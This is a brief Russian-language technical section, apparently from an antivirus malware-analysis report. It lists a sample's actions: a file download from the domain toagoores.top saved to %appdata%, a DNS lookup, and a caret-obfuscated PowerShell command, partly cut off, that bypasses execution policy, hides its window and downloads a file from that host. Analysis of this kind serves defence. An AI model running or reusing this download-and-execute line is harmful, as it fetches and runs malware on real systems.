Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWERS^he^Ll.EXE -^EXecUT^Ion^pol^ICy ^by^Pas^s^ -No^pR^oF^iLE^ ^-W^i^N^D^o^w^St^YLe^ hI^dDEn (New-Ob^j^ect^ sysTEM.nET.WeB^CliEnt^).^D^ownloA^Dfil^e('http://toagoores.top/re...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "pOWERS^he^Ll.EXE -^EXecUT^Ion^pol^ICy ^by^Pas^s^ -No^pR^oF^iLE^ ^-W^i^N^D^o^w^St^YLe^ hI^dDEn (New-Ob^j^ect^ sysTEM.nET.WeB^CliEnt^).^D^ownloA^Dfil^e('http://toagoores.top/re...' (со скрытым окном)